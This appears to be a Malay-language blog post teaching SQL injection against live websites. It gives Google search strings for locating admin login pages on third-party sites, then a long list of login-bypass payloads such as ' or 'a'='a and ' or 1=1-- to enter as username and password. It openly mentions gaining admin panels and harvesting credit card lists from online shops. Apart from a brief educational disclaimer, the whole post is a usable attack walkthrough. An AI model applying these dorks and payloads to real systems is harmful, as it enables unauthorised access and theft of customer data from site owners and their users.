Perhatian : Dokumen ini ditulis untuk kegunaan pendidikan dan pembelajaran. Penulis tidak dapat bertanggungjawab atas bagaimana topik yang dibahas dalam dokumen ini yang diterapkan.
SQL Injection adalah memasukkan kod-kod SQL untuk mendapatkan akses ke database yang lebih besar daripada yang seharusnya kita dapatkan, terutama pada script yang tidak meluluskan input dari user.
SQL Injection sebenarnya sudah sering dibahas dimana-mana, tetapi ternyata masih banyak webmaster yang belum tahu atau tidak peduli akan kelemahan ini.
Apa saja yang diperlukan untuk melakukan SQL Injection ?
1. Internet Explorer (wajib)
2. PC yang terhubung ke Internet (wajib, kecuali Anda mahu hack PC Anda sendiri)
3. Segelas kopi untuk menghilangkan rasa mengantuk (optional)
4. Metallica, Music (optional)
OK, Teruskan saja kita praktikkan, supaya lebih senang.
Pertama bukalah www.google.com untuk mencari script yang terhubung ke database. Masukkan salah satu keyword di bawah ini (lengkap dengan tanda "" ) :
"/admin.asp"
"/login.asp"
"/logon.asp"
"/adminlogin.asp"
"/adminlogon.asp"
"/admin_login.asp"
"/admin_logon.asp"
"/admin/admin.asp"
"/admin/login.asp"
"/admin/logon.asp"
"/admin/adminlogin.asp"
"/admin/adminlogon.asp"
"/admin/admin_login.asp"
"/admin/admin_logon.asp"
"/administrator/admin.asp"
"/administrator/login.asp"
"/administrator/logon.asp"
“root/login.asp”
“admin/index.asp”
Anda boleh menambahkan alamat-nya berdasarkan kreatif Anda sendiri.
Bukalah salah satu link yang ditemukan oleh google, kemungkinan Anda akan menjumpai sebuah halaman login (user name dan password).
Masukkan kod-kod berikut,
User name : ‘ or ‘a’=’a
Password : ‘ or ‘a’=’a
( termasuk tanda ’ )
Jika berjaya, kemungkinan Anda akan masuk ke admin panel, di mana Anda boleh menambahkan berita, mengedit user yang lain, mengubah about, dan lain-lain. Jika bernasib Anda boleh mendapatkan daftar kad kredit yang banyak. (Jika website itu shop-online)
Jika tidak berberjaya, cubalah mencari link yang lain yang ditemuika oleh google. Menurut pengalaman saya, dari sekitar 20 link yang saya cuba, ada satu atau dua yang berhasil.
Banyak variasi kod yang mungkin, antara lain :
User name : admin
Password : ‘ or ‘a’=’a
Di bawah ini bisa dimasukkan baik ke user name maupun password :
' or 0=0 --
" or 0=0 --
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
') or ('x'='x
' or 1=1--
" or 1=1--
or 1=1--
' or a=a--
" or "a"="a
') or ('a'='a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
hi' or 'a'='a
hi') or ('a'='a
hi") or ("a"="a
Anda juga boleh memanjangkan kod-nya sesuai kreatif Anda.
Hacking adalah seni. Hacking adalah perpaduan dari pengetahuan, kreatif dan kesabaran. Jika Anda memiliki ketiga-tiganya Anda akan berhasil.
0 comments:
Post a Comment